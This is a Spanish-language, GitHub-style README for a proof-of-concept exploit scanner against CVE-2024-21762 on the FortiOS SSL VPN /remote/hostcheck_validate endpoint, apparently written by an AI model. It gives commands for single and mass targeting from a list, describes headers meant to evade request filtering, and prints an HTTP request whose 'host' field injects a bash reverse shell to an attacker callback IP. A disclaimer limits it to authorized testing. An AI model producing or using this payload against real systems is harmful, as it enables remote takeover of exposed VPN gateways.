
Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate del SSL VPN de FortiOS con entrega de payload de shell inversa.
Escáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint /remote/hostcheck_validate de SSL VPN de FortiOS con entrega de payload de shell inversa.
Aquí tienes una redacción estilo GitHub para tu proyecto, que incluye un resumen limpio y conciso, una guía de uso y contexto sobre cómo encaja con el CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerEscáner de prueba de concepto dirigido a CVE-2024-21762 en el endpoint
/remote/hostcheck_validatede SSL VPN de FortiOS con entrega de payload de shell inversa.
Este script de Python es una herramienta PoC (Prueba de Concepto) diseñada para interactuar con la interfaz SSL VPN de FortiOS de Fortinet, dirigida a CVE-2024-21762 — una vulnerabilidad de desbordamiento de búfer basado en pila o inyección de comandos en el endpoint /remote/hostcheck_validate.
Descargo de responsabilidad: Esto es solo para fines educativos y de pruebas autorizadas.
/remote/hostcheck_validate en una interfaz SSL VPN de FortiGate.host).User-Agent, Cookie) para evadir el filtrado superficial de solicitudes de FortiOS.last_response.txt)tqdm para visualización del progresoInstala las dependencias:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: Lista de objetivos en formato IP:PORT, uno por línearesults.txt: Registro de salida de los intentos de explotaciónPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
La herramienta escribe la respuesta HTTP completa de cada intento en:
last_response.txt
Úsalo para verificar si la solicitud fue procesada, rechazada, o si se devolvió un código de error.
Este código se proporciona solo con fines educativos y de pruebas autorizadas. No lo utilices en redes o sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Carter — Ingeniero de Ciberseguridad, entusiasta de Red/Purple Team, fanático de la automatización de PoC.
¿Te gustaría que esto se empaquetara en un archivo README.md + estructura de repositorio lista para subir a GitHub? Puedo generarlo a continuación.